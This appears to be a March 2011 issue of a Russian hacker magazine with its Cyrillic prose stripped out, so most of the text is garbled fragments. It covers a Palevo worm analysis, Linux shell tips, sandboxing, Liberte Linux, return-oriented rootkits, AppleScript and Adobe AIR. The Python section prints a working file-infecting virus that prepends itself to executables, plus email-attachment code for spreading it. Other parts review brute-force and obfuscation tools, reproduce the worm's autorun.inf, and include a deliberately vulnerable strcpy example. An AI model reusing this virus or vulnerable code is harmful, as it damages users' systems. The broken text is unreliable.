* X 03 /146/ 2011

* .
.
13.
.
14. , ,
, ,

.

,

(load_file)
magic_quotes.


.

:
/tmp/;

phpinfo() ;

*nix-;
;
.

.
(
) .

ReadMe
.

,
mwg.far.ru mwgrasp.oni.cc (,

).

: SSH Bruteforce
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Kaimi

SSH
X 03 /146/ 2011

SSH SSH
Bruteforce Kaimi!
:

,

:).

;
(
, ,
;);
IP
;
-
;
brute_good.txt;
IP ( IP
,

).

:
eval() $$var_name,

UTF-8.


kaimi.ru/2010/10/php-obfuscator-1-5.

: Rings Skyper
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Sin3v


: kaimi.
ru/2010/12/ssh-bruteforce.

: PHP Obfuscator 1.5


: *nix/win
: dx


Rings Skyper sin3v.org.

:
1. ;
2. ;
3. ;
4. .
:

PHP

PHP- PHP Obfuscator dx.
:
;
;
;
PHP;
INTEGER;
;
;
-;
PHP;

c
.

;

( );

( );
;

;
;
Skype,
;
, -;
;
3-5 .

,

:).
z

073

MALWARE
, Senior Malware Analyst, Heuristic detection group, Kaspersky Lab

PALEVO!

Palevo
Mariposa. ,
2010 .
:
autorun.inf ,
, , .
, Palevo
.
.
PE 166 ,
. ,
, Explorer. ,
, ,
. String Table,
. , . Resource Hacker.
: .text, .rdata, .data .rsrc,
, -,
Gjgpycll. , .

Hiew? ,

074

PE- . .
, . , ,
. .
,
.
Hiew . ,
, , , , PE-.

.
IDA, Hex-Rays.
, ,
X 03 /146/ 2011

>> coding

Palevo
API-. , GetCommandLineW
EAX. ,
, , API EAX
.
.
. OpenProcess, ,
,
. , ESP,
MOV ecx, [esp-1Ch]. Windows XP (ESP
0x1C), , 0xFFFFFFFF.

RETN.
Palevo. ,
, , . :
add
inc
cmp
jl

d , [eax] * 4 [000424C3A], 06B9700BA


eax
eax, 00000013D
000401110

ADD.
VirtualAlloc ,
.
.
. kernel32.dll
PEB .
, ,
, PE,
Hiew, .
, ADD.

. , , ,
Morphex PE32 Loader. ,

PE-. ,
,
.
, Palevo.
,
. MSVC8
. :
, . X 03 /146/ 2011


explorer.exe.
Hex-rays ,
. ,
,
Progman , , ID , . ,
VirtualAllocEx, -
WriteProcessMemory
CreateRemoteThread. , Progman
Windows Explorer. , ,
-, explorer.exe. ?
, :
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
Winlogon\TaskBar . ,
TaskBar ,
, .
autorun.inf. , , ,
. autorun.inf :
shellexecute=vikipiki\\\rajlaus.exe
action=Open folderto view files usingWindowsExplore
USEAUTOPLAY=1

075

MALWARE

000

,
open=vikipiki\\\rajlaus.exe
icon=shell32.dll,4
shell\\\Install\\\command=vikipiki\\\rajlaus.exe
shell\\\open\\\command=vikipiki\\\rajlaus.exe
shell\\\explore\\\command=vikipiki\\\rajlaus.exe
Shell\\\open\\\command=vikipiki\\\rajlaus.exe
shellexecute=vikipiki\\\rajlaus.exe

, ,
:
******.ananikolic.su
****.pickeklosarske.ru
*****.pornicarke.com
*****.losmibracala.org
92.***.*90.237

.
, :
DONE!
FAIL!
Drive infected: %c
USBS stopped, %d infected
USBS not running
USBS already running

USBS started
Advertising: %s
Adware2 stopped, %d URLs displayed
Adware already running
Adware not running
Adware2 running: %d browsers, %d URLs
Error=%d, GLE=%d
Already downloaded id=%d
Downloading %s to %s
Done, %s

, Palevo
. ,
- .
,
Hiew / IDA.

, . ,
-
,
API . :)?
, , ,

explorer.exe.
autorun.inf . , Palevo
, ,
, . , ,
. z

Icon Group String Table`, Palevo

076

X 03 /146/ 2011

MALWARE
deeonis deeonis@gmail.com

Python


. ,
, ,
, ,

, , :
, , .
Python , .
, ,
HLLx (High Level Language, x ).
HLLx-:
(Overwrite) HLLO, (Companion) HLLC
(Parasitic) HLLP.
, ,
. .

. .
- , . , HLLC-

078

, (
. .) - . ,
,
. , . HLLP
-.
-, . -
,
, .
, , ,
, .
, HLLO-, HLLC- , -. ,
-.
,
.
HLLP-, . ,
X 03 /146/ 2011

>> coding

.
. , ,
,
.
:
HLLP-
import sys
import os
import shutil
virPath = os.path.split(sys.argv[0]);
names = os.listdir('.');
fvir = open(sys.argv[0], 'rb');
virData = fvir.read(19456);
for name in names:
namePair = os.path.splitext(name);
if namePair[1] == '.exe' and \
name != virPath[1]:
os.rename(name, name + 'tmp');
fprog = open(name + 'tmp', 'rb');
progData = fprog.read();
fnew = open(name, wb);
fnew.write(virData + progData);
fnew.close();
fprog.close();
os.remove(name + 'tmp');
origProgData = fvir.read();
origProg = 'original_' + virPath[1];
forig = open(origProg, 'wb');
forig.write(origProgData);
fvir.close();
forig.close();


virPath = os.path.split(sys.argv[0]). ,
, .
if . fvir.
read(19456). 19456 (
, ,
). ,
.
exe . , ,
,
,
.

WARNING
warning

.

!
,

,

os.execl(origProg, ' ');

: sys, os,
shutil. sys ,

. , , sys.argv[0].
os ,
. ,
,
. , shutil
.

, .
os.listdir('.')
,
.
, , .
, ,
if :
name != virPath[1],
X 03 /146/ 2011

079

MALWARE

000

, Linux -

os.remove(name+'tmp').
,
.
( , 19456 ?), exe, .
,
.
, .
, ,
,
. ,
,
, .
.
.

,
.
,
.
, .
,
. ,
e-mail.
, Python
. , :

080


import smtplib
from email.mime.text import MIMEText
msg = MIMEText('Message text')
# me == email
# you == email
msg['Subject'] = 'Test message'
msg['From'] = me
msg['To'] = you
s = smtplib.SMTP('')
s.sendmail(me, [you], msg.as_string())
s.quit()

smtplib
MIMEText. , . , ,
SMTP-.
,
. ,
.
.
:

import smtplib
import mimetypes
from email import encoders
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
X 03 /146/ 2011

>> coding


outer = MIMEMultipart()
# me == email
# you == email
outer['Subject'] = Test message
outer['From'] = me
outer['To'] = you
ctype, encoding = mimetypes.guess_type(path_to_file)
if ctype is None or encoding is not None:
ctype = 'application/octet-stream'
maintype, subtype = ctype.split(/, 1)
fp = open(path_to_file, rb)
msg = MIMEBase(maintype, subtype)
msg.set_payload(fp.read())
fp.close()
encoders.encode_base64(msg)
msg.add_header('Content-Disposition',
'attachment', filename=file_name)
outer.attach(msg)
s = smtplib.SMTP('')
s.sendmail(me, [you], outer.as_string())
s.quit()

mimetypes,
encoders, MIMEMultipart MIMEBase. MIMEMultipart
-
(, ). MIMEBase , exe.
MIMEMultipart MIMEBase, base64 .
,
X 03 /146/ 2011

, ,
e-mail.
. , ,
, .
Outlook.
Python Win32 Extensions.

:
, exe .
Windows?.
exe. -, .
( , ,
][,
:)),
.
, , win-,
, .
os.path.split(). ,
-, sys.argv[0] (, virus.py). exe
(C:\Windows\virus.exe).
, os.path.split().
19456.
, exe, .
.

, Python , ,
. ,
:). z

081

UNIXOID
grinder@tux.in.ua
zobnin@gmail.com
adeptg@gmail.com

,
. ,
,
, , . ,
,
.


bash
PS1.
man-,
,

, -

082

. , , Ubuntu
PS1 :
'${debian_chroot:+($debian_
chroot)}\u@\h:\w\$ '


:
@_:_$

, '\u',
'\h',
'\w'. ,
debian_chroot,
,
chroot-. , , ,
, bash
.
X 03 /146/ 2011

INFO

info
FreeBSD
rsync


.

<Ctrl+T>
cp,


.

bash

alias, ,

, . :
\d
\j
\A
\!

, PS1
, ,
PS1 ,
, , ,
( $?),
, .
'\n' PS1,
,
(
):
PS1='\n\w\n\u@\h:$?\$ '

. chroot ,
,

. ,
, gmail
Wi-Fi:
$ vi ~/.bashrc
# Google-
weather(){
# ?
local city="Moscow"
curl -s "http://www.google.com/ig/
api?weather=$city" | sed 's|.*<temp_c data="\
([^"]*\)"/>.*|\1|'
}
# Google-
X 03 /146/ 2011

unread_mail(){
# ( @gmail.com)
local login=""
local password=""
wget --secure-protocol=TLSv1 --timeout=3
-t 1 -q -O https://${login}:${password}@
mail.google.com/mail/feed/atom --nocheck-certificate | grep fullcount | sed
"s/<fullcount>\(.*\)<\/fullcount>/\1/"
}
# Wi-Fi
wifi(){
/sbin/iwconfig wlan0 | grep Quality | cut -d
= -f2 | awk '{print $1}'
}
PS1='\n`weather`:`unread_mail`:`wifi`:\w\n\
u@\h:$?\$ '

~/.bashrc
600, .
:
-7:32:70/70:/usr/local
j1m@1313:0$


man-
,
most


export
MANPAGER="/usr/
bin/most -s
~/.bashrc.
stty
-echo

,
.




.





setterm -cursor off
setterm -blank 0.

.
.
escape-
, .
escape- \[\033[
\], m.
. ,
0;30, 0;32,
0;31, 1;33, 1;37 .
( h)
(u), ,
(w), ~/.bashrc
PS1 :

HTTP://WWW
links

fortune-mod-ru:
jack.kiev.ua/fortunemod-ru
bashDirB (Directory Bookmarks for BASH):
dirb.info/bashDirB.

PS1="\[\033[0;31m\]\u@\h:\[\033[1;33m\](\w)\

083

UNIXOID

bash

[\033[0m\]\[\033[0m\]"

.
40 () 47 ().
PS1="[\033[32;40m\w\[\033[0m\]>"

, , , ,
. :
local GRAY="\[\033[1;30m\]"
local NO_COLOUR="\[\033[0m\]"

bash?
, bash
.
compgen, .
/etc/bash_completion ( ~/.bash_completion),
/etc/bash_completion.d,
, .
bash
.
, MPlayer avi mpg, :
complete -f -X !*.@(avi|mpg|AVI|MPG/so) mplayer

,
. :
alias ls='ls --color=auto'
alias grep='grep --color=auto'

.
dircolors, LC_COLORS.
, :

, MPlayer
, , , , .
case. ,
.

bash_completion. .
, tar :
COMPREPLY=( $( compgen -W 'c t x u r d A' -- "$cur" ) )

$ dircolors --print-database

/
etc/DIR_COLORS ( ~/.dir_colors),
.
cout (code.google.com/p/cout)
Python, make, gcc, svn
diff. ,
, :
$ alias makec='cout data/make-gcc.cfg'

, Makefile:
$ makec -f Makefile

bash

, bash <Tab>. , ,
.
-.
, Linux-,
, bash ,
. Gentoo ( Calculate Linux) .
. ?

084

, , bash .
compgen . '-b'
, '-c' , '-v'
. man-
bash, complete compgen.

Bash , .

dotfiles
dotfiles (IP- 192.168.1.1,
10000) netcat pv:
host1$ tar -cf dotfiles | pv | nc -l -p 10000 -q 5
host2$ nc 192.168.1.1 10000 | pv | tar -xf -

, host1 OpenBSD, :
obsdhost1$ tar -cf dotfiles | pv | nc -l 10000

X 03 /146/ 2011

-

, , setterm stty.
shopt -p (shopt
Shell Options). :
autocd ,
( cd), ;
cdspell bash (, /ect/init.d /etc/init.d) cd;;
checkjobs , ;
cmdhist ,
;
dirspell
;
globstar **, , , ;
wildchar ,
mp3 :
$ ls **/*.mp3

, , :

LC_COLORS
:
1. Bash ,
. PROMPT_DIRTRIM.
,
, . :

$ find ./ -name "*.mp3" -type f -print


$ export PROMPT_DIRTRIM=3

2. Bash ,
$ shopt -s autocd cdspell checkjobs cmdhist dirspell
globstar



, :
$ vi ~/.bashrc
twit()
{
curl --basic --user : --data
status="$*" 'http://twitter.com/statuses/update.
xml' -o /dev/null;
}

:
$ twit ' '

140 .
X 03 /146/ 2011

ls.
ls, bg, fg, exit
:
$ export HISTIGNORE="&:ls:[bf]g:exit"

3. Bash , , sudo, root'


.
/etc/bash.bashrc:
export HISTFILE=$HOME/.bash_hist-`whoami`


, .
, mc, ,
. ,
, sync? rsync,
,
. ~/.bashrc :

085

UNIXOID

fish

alias cpr='rsync --progress'

cpr cp:

Directory Bookmarks for BASH (dirb.info/bashDirB)


,
.
:

$ cpr file1 file2


$ wget -c http://www.dirb.info/bashDirB -o ~/.bashDirB

'--remove-source-files',
(, ,
mv rsync).
,
.
, , ,
pv (Pipe Viewer). cat,
, .
:
$ tar -czf /path/to/dir | pv > /path/to/archive.tgz
758MB 0:01:29 [8,48MB/s] [
<=>

. .
pv ( ) '-s':
$ tar -czf /path/to/dir | pv -s $(du -sb /path/to/dir |
grep -o '[0-9]*') > /path/to/archive.tgz
461MB 0:00:21 [ 32MB/s] [=============================
==========>
] 60% ETA 0:00:13

,
.


. Bash
(, ,
cd, cd -), .
, (aliases), :
alias cdwww='cd /var/www'

, .
. , ,
~/.bashrc .

086

~/.bashrc :
source ~/.bashDirB

. :
$ cd /var/www
$ s www

~/.DirB/www,
. ,
, g www. .
. , p :
$ p www
/var/www
~

How much is the FISH?



FISH
(Friendly Interactive Shell). bash . Fish .
, , , (, ,
). Fish ,
, ,
, . ,
Fish sh.

X 03 /146/ 2011

tar

bash4
, , s1 .
'-r'.
, bashDirB
PS1 ,
history. ,
.
bashDirB apparix
(micans.org/apparix), : bm (
), to ( ) portal ( ). bash csh.
Debian/Ubuntu
.

Linux- . ,

. fortunes, .

, .
Debian Ubuntu, :

$ fortunes -f

/usr/share/games/fortunes, .
'-m'
, .
strfile
(strfile _).
RSS-, ,
, . fortunes
cowsay xcowsay. owsay Perl,
,
ASCII-.
$ sudo apt-get install cowsay xcowsay

, ,
. , uptime:
$ uptime | cowsay

( Linux Mint):
$ sudo apt-get install fortunes fortunes-debianhits fortunes-ubuntu-server fortunes-min fortune-mod
fortunes-ru


. , ,
fortunes-ru
(, linux.org.ru: lorquotes.ru/
fortunes.php).
.
~/.bashrc
:
$ echo "fortune" >> ~/.bashrc

( source ~/.bashrc). C
, :
X 03 /146/ 2011

$ cowsay 'fortune'

, /usr/share/cowsay/
cows. '-f'.
: '-t' ,
'-p' , '-w' . , ~/.bashrc:
COWDIR=/usr/share/cowsay/cows/;
COWNUM=$(($RANDOM%$(ls $COWDIR | wc -l)));
COWFILE=$(ls $COWDIR | sed -n ''$COWNUM'p'); fortune |
cowsay -f $COWFILE

, . , ,
, . z

087

UNIXOID
zobnin@gmail.com



, -
.
, ,
UNIX-

.

, ,
.
,
( Windows
, UNIX
, ).
, ; 95%
Ubuntu,
deb-; xspy;
KDE GNOME,
, ,

088

... .
, , ,
,
.



,
Linux
chroot, FreeBSD
jail (), Solaris (,
, ).

,
. ,

.
,
, (

, , )
.
, .
, chroot
, .

,
, /
,
.
, .
, -
,
.
,
.
, ( ,
, ).
X 03 /146/ 2011

named systrace

,
,
- .
, .
,
: (
)
sudo. , , ,
KDE GNOME.

(600, ),
.
,
,
Linux,
,
(,
,
). .

,
,
.
, , ,
, ,
, ,
,

.
X 03 /146/ 2011



(, ,
). , Linux

.

,
, .
Linux
:
1. (HIDS),
SELinux AppArmor, ,
.
,
sandbox,
.
2. ptrace ,
,
.

,
, plash, sydbox systrace,
.
3. . Plan 9 Linux
procfs UTF-8,
clone()
. Linux, 2.4.19,
. , ,

/dev/sda1, ,
/dev/sda5, /home, procfs /proc,

INFO

info

,

,

fakeroot,

,

root (

).
QubesOS (qubesos.org) Linux,





.
sandbox,
SELinux,


/
home/$USER /tmp.

'-H' '-T': sandbox
-H ~/fakehome -T ~/
faketmp vi.

089

UNIXOID

Sandbox
/dev/sda2,
, /dev/sda7, /root, /proc.
, , .
,
. 2.6
,
IPC. ,
, ( ) IPC.
LXC ,
, (stgraber.org).
4. seccomp
, , exit(), read() write()
, . ,
GRID ( ,

), Google
Chrome.
,
,
. , web-

exec() /etc/passwd,
, ?
:
1. ,
SELinux AppArmor.
, .
SELinux , ,
.
2. -. , .
,
TCP- - - .
, .
SELinux .
3. .

. ,
,
, ,
.

090

4. ,
. ,
Windows,
/ . , , ,

.
, , , ,
.
: sandbox,
SELinux
; systrace, ptrace; python-, .

Sandbox SELinux

Sandbox , SELinux
. SELinux,
, .
,
sandbox, . ,
; ; ,
sandbox, .
,
,
, . ,
sandbox . , , - . :
$ cat /etc/passwd | sandbox cut -d: -f1 > /tmp/users

cut, ,
,

2.2, Linux capabilities,



(,
,
).
X 03 /146/ 2011

systrace

sandbox,

( /etc/passwd)
/tmp/users (
). /etc/passwd,
, :
$ sandbox cut -d: -f1 /etc/passwd > /tmp/users
/bin/cut: /etc/passwd: Permission denied

- . sandbox ,
SELinux. , , ,
( sandbox_t,
system-config-selinux,
Fedora). , sandbox
,
'-t'. , SELinux.
X 03 /146/ 2011

,
sandbox
. '-X',
. -, X- Xephyr, X-

X-. Xephyr
Matchbox,
( Xephyr,
X-).
/tmp, ,
:
1. SELinux
$HOMEDIR /tmp.
2. SETUID- /usr/sbin/seunshare,
, ID SELinux .
3. seunshare ( , )
$HOMEDIR /tmp.
4. , X- /home /tmp.

SELinux: sandbox_file_t,
/tmp,
.
, ,
sandbox_web_t ( HTTP)
sandbox_net_t ( ):
$ sandbox -X -t sandbox_web_t firefox google.com

SElinux
selinux-policy 3.6.12
policycoreutils 2.0.62.

091

UNIXOID

SYSTRACE /SYSJAIL SMP EXPLOIT

, OpenBSD/NetBSD- systrace, 2007

Systrace

, systrace system call interposition, NetBSD


OpenBSD, Linux,
ptrace- ( , )
,
.
systrace (
sandbox) ,

.
,
. , , strace.
Linux systrace ,
OpenBSD, :

$ systrace -t ls

,
, .
, , permit
() deny ().
, ,
.
systrace ,

, ,
, , exec().
systrace ,
'-A':
$ systrace -A ls

$ sudo apt-get install build-essential \


libevent-1.4-2 libevent-dev
$ wget http://www.provos.org/uploads/systrace-1.6g.tar.gz
$ tar -xzf systrace-1.6g.tar.gz
$ ./configure --prefix=/usr/local && make
$ sudo make install

systrace .
:
$ systrace ls

xsystrace .
xsystrace systrace,
:

092

~/.systrace:
$ ls -l /home/j1m/.systrace/
-rw------- 1 j1m j1m 631 2011-01-04 12:24 bin_ls

, ,
, ,

.

sandbox-2

Sandbox, ,
, , . X 03 /146/ 2011

systrace
,
,
, .
, , ,

, - .
, :
1. ( $NEWROOT) copy-on-write
( aufs).
2. /home $NEWROOT/home.
3. .
4. procfs $NEWROOT/proc.
5. chroot $NEWROOT .
,
,
, , /home ( ),
. IPC
, , . X 03 /146/ 2011

, .
,
:
$
$
$
$

sudo apt-get install bzr


bzr branch lp:~stgraber/+junk/sandbox
cd sandbox; make
sudo make install

sandbox-gui,
( , /home /tmp)
. , .


, Linux
.
,
,
, .
z

093

UNIXOID
iv ivinside.blogspot.com

-
-
Liberte Linux:


: ,

. ,
Liberte
Linux.
Liberte

Liberte Linux
LiveUSB-, ,
.
,
() , ,
.
,
,
:
(
Hardened Gentoo Linux);
;
;
Tor;
Tor (

094

2011.1);

.
,
Gentoo, , , . ,
SD-,
. , GTK; Openbox; X-
TrueType .
unicode- , .

Hardened Gentoo,
, SSP ( -

) ASLR (
).
:
Midori 0.2.8 , WebKit GTK;
Claws Mail 3.7.6

,
GnuPG;
Sakura 2.3.8 , VTE;
Audacious 2.4.0
(mp3, ogg, flac, ape);
GNOME Mplayer 0.9.9.2
GNOME , mplayer GTK;
PCManFM 0.9.7
(Midnight
Commander );
X 03 /146/ 2011

,
Liberte Linux: -
Evince 2.30.3 pdf ( DjVu);
Abiword 2.8.6, Gnumeric 1.10.6
Microsoft Word Excel.

(
dee.su/liberte, ),
256 .
, .
, 128 Pentium
Pro.
Linux:

1. : mkdir /
media/usbstick.

2. : mount /dev/sdb1 /media/


usbstick.

3. :
unzip liberte-2010.1.zip -d /media/usbstick.

4. :
cp /media/usbstick/liberte/setup.sh /tmp/
setup.sh.
5. : chmod +x /tmp/setup.
sh.
6. : umount /dev/sdb1.
7. : /tmp/setup.sh
syslinux
4.02,
.
Arch Linux,
syslinux 4.03 - :
$ head -n5 setup.sh
#!/bin/sh -e
# syslinux
sysver=4.03
# mbr.bin ( find /
-name mbr.bin)
sysmbr=/usr/lib/syslinux/mbr.bin

Windows ,

setup.bat .
syslinux , .

It's easy to use!

, BIOS' , Liberte,
X 03 /146/ 2011



. , ,
, (Alt+F2). ,
,
.
usermod -U root passwd.
sudo,
,
.
Liberte Linux ,
OTFE
AES-256
XTS.
,
otfe-resize.

, .
$ cat /etc/conf.d/liberte
#
OTFEFILE=/otfe/liberte.vol
OTFELABEL="Liberte OTFE"
# ,
(A/B)
OTFESIZE=1/4

DVD
dvd
, ,
Liberte
Linux
Linux
Windows.

INFO

info
Install
Liberte
Linux

VirtualBox
.


FAT(16)
USB-.

# ,

OTFECIPHER=aes-xts-plain
OTFEKEYSIZE=256
OTFEHASH=sha256
# LVM
# ( otfe-resize)
OTFEVOLUME=otfe


GnuPG
GPA, .

OTFE.
, .
Midori

095

UNIXOID

Liberte Linux

splash-
Tor. ,
Tor,
(, DNS-, ,
DHCP-, ),
.
, iptables -L .
DHCP, DNS, NTP Tor, DHCP ,
, ARP IPv4LL (IPv4 Link-Local Addresses) .
Wi-Fi MAC-
mac-randomize. , Liberte
, DNS
web-.
: ,
( ),
.

,
, M-16 .

,

. Liberte Linux

,
. , , 2011.1, , ,
.
,
, Claws-Mail. ,
, IRC XChat IM- Pidgin ,
.
mp4- Speex .
, Liberte , ,
Compiz. Liberte
, . , : , ,
.
Maxim Kammerer <mk@dee.su>, .

Liberte . Linux , Gentoo.


, rsync,
.
SquashFS Tools 4.1.
-
4 .

Privatix Live-System
.
Debian CD-, USB-.
USB LiveCD.
UsbCryptFormat,
CryptBackup
. Firefox
Torbutton.
3 .

096

Liberte Linux 2011.1

DemocraKey LiveCD
. ,
, . ,
,
, .
, ,
,
. : Tor,
(Pigdin + OTR).

X 03 /146/ 2011

!
:
1. (
svn,
):
svn co https://liberte.svn.sourceforge.net/
svnroot/liberte/trunk/liberte liberte
2. /tmp/livecd:
liberte-2010.1-src/build /tmp/livecd
- svn, sourceforge.net:
$ wget https://downloads.sourceforge.net/
project/liberte/2010.1/liberte-2010.1-src.
tar.bz2
$ tar xjf liberte-2010.1-src.tar.bz2
$ mv liberte-201X.Y-src liberte
build fresh,
.
Liberte Linux LiveUSB-.
src/var/lib/portage/world
(, ,
) -

The (Amnesic) Incognito Live


System
Incognito
LiveCD , . , Incognito LiveCD,
CD-, .
, , -,
Tor, -,

.

GNOME,
GTK- (Firefox, OpenOffice, Pigdin
OTR )
2 ! , iso,
VirtualBox.

X 03 /146/ 2011

(
)

,
.
.
gentoo-portage.
com/browse.
/home/anon/ , , (, , ).
, , /etc.

Tor
. -, SSH-
, IP- .
, , ,
. ,
Tor e-mail ,

Liberte
Tor. (2010.1
)
, .
Liberte Linux I2P (
) , , DHT Kademlia, ,
, AES
IP-, ,
Network database .
.
,
mk@dee.su.

WARNING
warning
,
,

,
.

HTTP://WWW
links
dee.su/liberte
Liberte
Linux;
amnesia.boum.org
T(A)ILS;
mandalka.name/
privatix
Privatix LiveSystem;
sourceforge.net/
projects/democrakey

DemokraKey;
i2p2.de/intro_ru.html

;

- ,
. MS ,
:
z

097

CODING
stannic.man@gmail.com

RETURN-ORIENTED
ROOTKITS !


.
, ,


?

, , .
.
, -

098

. ,
, ,
.
, ,
( ).
X 03 /146/ 2011

>> coding


,
, ,
, ,
, (root certification authority,
). , , , . ,

Microsoft, Windows XP. ,

,
() ,
. ?
,
.
, ,
:
( ,
WRITABLE |
EXECUTABLE).
OpenBSD 3.3, , PaX ExecShield Linux.
Windows
Data Execution Prevention (DEP),
Windows XP SP 2 Windows
Server 2003.
DEP .
2 (SP2) Windows XP
32- Windows : no-execute page-protection
(NX), AMD,
Execute Disable Bit (XD),
Intel. ,
DEP,
( ,
).
DEP : support.microsoft.com/
kb/875352/ru.
,
,
.
memory shadowing. ,
X 03 /146/ 2011

.
VM

. ( ,
)

.

,
. , , -
,
.
win-
Win2k Linux 2.4. ,

QEMU, VMware VirtualBox.

, , , .
,
-
(). - ( ,
)

. ? . ,
/,
,


. .
, .
.
. ,
return( __asm ret
), ( ) .
, return

-.

DVD
dvd

.

,


,
19 ,

,


.

099

CODING

?

, , .
ret . -,
4 EIP . -, ESP 4 ,
(2 ) ,
EIP.
, .
,
ret,
.
, return
. , -
ASM , , return- POP EAX; JMP EAX. ,
ret,
EAX
. return-

.
, ret
return- ? . 86- ret (3)
1/256.
, ( ,
) , .

,
.

100

Pro & Cons

- , ,
.
,

. ,
( EIP
ESP), .

#1:

? , , , :).
. , .

EIP -
.
,
. ESP
,
. , ,
,
EIP.

#2: vtable
++

C++ ,
(vtable).
, vtable, ,
? ,
,
, X 03 /146/ 2011

>> coding


vtable ,
.

. ,


. ,
vtable, , .

#3:

vtable,

.
-, ,
- .

. ,
.

#4:
setjmp

Linux . setjmp longjmp,


goto.
, ,
,
setjmp
jmp_buf,
EBX, EDI, ESI, EBP, ESP EIP. , ? EIP
CALL ,
ESP. setjmp
EAX .
longjmp.
, EAX , longjmp, ESP .
X 03 /146/ 2011

setjmp/longjmp
struct foo
{
char buffer[160];
jmp_buf jb;
};
int main( int argc, char **argv )
{
struct foo *f = malloc( sizeof(*f));
if( setjmp(f->jb) )
return 0;
strcpy( f->buffer, argv[1] );
longjmp( f->jb, 1 );
}

strcpy( f->buffer, argv[1] ).


-, . *nix ,
:).

, ? ,
.
, - , !
,
.
.
, ,
.
-
.
,
,
.
! z

HTTP://WWW
links

, ,
,



-
( MSDN
).


, .

blog.
threatexpert.com
alex-ionescu.com.

101

CODING
seva@vingrad.ru

AppleScript

MAC OS X

AppleScript
, AppleScript,
,
.

, . ,
,
GUI-, , .

shell, Perl, PHP . ( )
Mac OS X.
, Mac OS X . AppleScript.
AppleScript System 7.
HyperCard (
HyperTalk, ), AppleScript
, ,
. AppleScript
:

. ,
Mac OS X AppleScript , Cocoa
AppleScript .


Script Editor.

102

/Application/AppleScript.
HelloWorld .
display alert "Hello World!" #
say "Hello World" #

, , ,
AppleScript c
say. Apple
:). , . ,
:

display alert "Hello World!" buttons {"Hello", "Bye"}
set answer to button returned of the result
if answer is "Hello" then
...
else
...
end if

- . , :
#
set theFile to (choose file with prompt
"Select a file to read:" of type {"TEXT"})
open for access theFile
X 03 /146/ 2011

>> coding

, iTunes
AppleScript
#
set fileContents to (read theFile)
close access theFile

AppleScript
.
, . -
.

AppleScript
:
tell application "Microsoft Word"
quit
end tell

C tell ,
. MS Word . tell end tell . , ,
. , . iTunes, ,
AppleScript:
iTunes
tell application "iTunes"
play the playlist named "My Favorite"
end tell

, AppleScript, ,
( AppName.scriptRerminology ).
Script Editor File Open Dictionary ..., .
,
, . , , :
.
, Mac-: open, print,
close quit.
.

AppleScript

Objective-C/Cocoa, ,
AppleScript.
X 03 /146/ 2011

Script Editor
Cocoa-
NSAppleScript. iChat .
NSAppleScript *iChatGetStatusScript = nil;
iChatGetStatusScript = [[NSAppleScript alloc]
initWithSource:
@"tell application \"iChat\"
to get status message"];
NSString *statusString =
[[iChatGetStatusScript
executeAndReturnError:&errorDict] stringValue];

, ,
,
, . ,
.

Cocoa-

ocoa,
AppleScript, ,
AppleScript,
, , , , .
AppleScript, .
.scriptSuite .scriptTerminology .sdef. XML, sdef
.
scriptTermonology Script Editor
.
AppleScript .
scriptSuite- Plist Editor, , :
AppleEventCode ,
AppleScript (
);
Name ,
.
,
sdef-.
sdef-
<?xml version="1.0" encoding="UTF-8"?>

103

CODING

SAFARI.scriptSuite Plist Editor-


<!DOCTYPE dictionary SYSTEM "file://localhost/
System/Library/DTDs/sdef.dtd">
<dictionary title="My Application Terminology">
<!-- -->
<suite name="My Application Scripting"
code="XXXX"
description="Commands and classes">
<classes>
<class name="application" code="capp"
description=""
inherits="NSCoreSuite.NSApplication">
<cocoa class="NSApplication"/>
<properties>
<!-- -->
<property name="some value "
code="sval" type="string"
description="A value ">
<cocoa method="value"/>
</property>
</properties>
</class>
</classes>
</suite>
</dictionary>

sdef - ,
.scriptingSuit-. ,
Cocoa-, AppleScripting.
Cocoa Info.plist Scripting OSAScriptingDefinition sdef:
Info.plist
...
<key>NSAppleScriptEnabled</key>
<true/>
<key>OSAScriptingDefinition</key>
<string>Scrtipting.sdef</string>

Scripting.sdef :
Scripting.sdef
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE dictionary SYSTEM
"file://localhost/System/Library/DTDs/sdef.dtd">
<dictionary xmlns:xi=
"http://www.w3.org/2003/XInclude"
title="Scripting dictionary">
<!-- / -->
<xi:include
href="file:///System/Library/

104

NSApplications
ScriptingDefinitions/CocoaStandard.sdef"
xpointer="xpointer(/dictionary/suite)"/>
<suite name="Scripting" code="VVVV"
description="Test Scripting">
<class name="applicaton" code="capp"
description="">
<cocoa class="NSApplication"/>
<!-- readonly
application -->
<property name="myprop"
code="Smrp" type="string"
access="r"/>
</class>
</suite>
</dictionary>

, AppleScript
myprop. ObjC-, .
NSApplication,

.
#import <Cocoa/Cocoa.h>
@interface NSApplication (Scripting)
- (NSString *) myprop;
@end
@implementation NSApplication (Scripting)
- (NSString *) myprop
{
return @"This is my property";
}

E AppleScript , :
tell application "Scripting"
properties
end tell

, AppleScript Cocoa- .
.
. z
X 03 /146/ 2011

CODING
Spider_NET , vr-online.ru

AIR

Adobe AIR
- -
. ,

web- HTML+CSS+JavaScript.
! Adobe AIR
.
AIR ,
. C++
WinAPI. AIR ,
. , : .

What is Adobe AIR

. Adobe AIR (Adobe Integrated Runtime)


.

106

HTML/CSS, Ajax, Adobe Flex Adobe Flash.


web-
(RIA Rich Internet Applications) .
Adobe AIR, , . (Windows, MacOS, Linux,
QNX, Android), .
, Windows Mobile/Windows Phone.
, , X 03 /146/ 2011

>> coding

AIR-
, AIR- . ,
. . AIR,
, Titanium
(. ).

,
.
, , Adobe AIR,
. , ,
web-
. . Adobe AIR
, .

( , , drag and drop
).

AIR-

AIR- ( ) Adobe AIR.


, , Adobe AIR. ,
Windows, unix-like
.

AIR

,
Adobe AIR. ? , .
.

AIR, SDK
.
(get.adobe.com/air/).
,
, .
, Adobe (,
Dreamweaver), , , ,
Aptana Studio (aptana.
com). , Eclipse, Aptana Studio Aptana
Eclipse, web- (html,
css, js). Aptana AIR
,
(aptana.com/products/air).

Hello world


Adobe AIR.
, Aptana
Studio. , ,
.
HelloWorld.
, (
General Project). Aptana
X 03 /146/ 2011

Aptana Studio
, .
, , .
?
AIR AIR.
. ,
. ,

.
,
. , ,
. .
Properties Project Natures.
, natures. AIR Nature.
OK.
. .

. ,
. :
, , .
- .

, .
AIR-,
:
1. . ,
.
,
.
. ,
. .
, ? .
, SDK. , ,

AIR. .
2. .
AIR- web- , ( ).
. , CSS, ,
. -

107

CODING

html-,
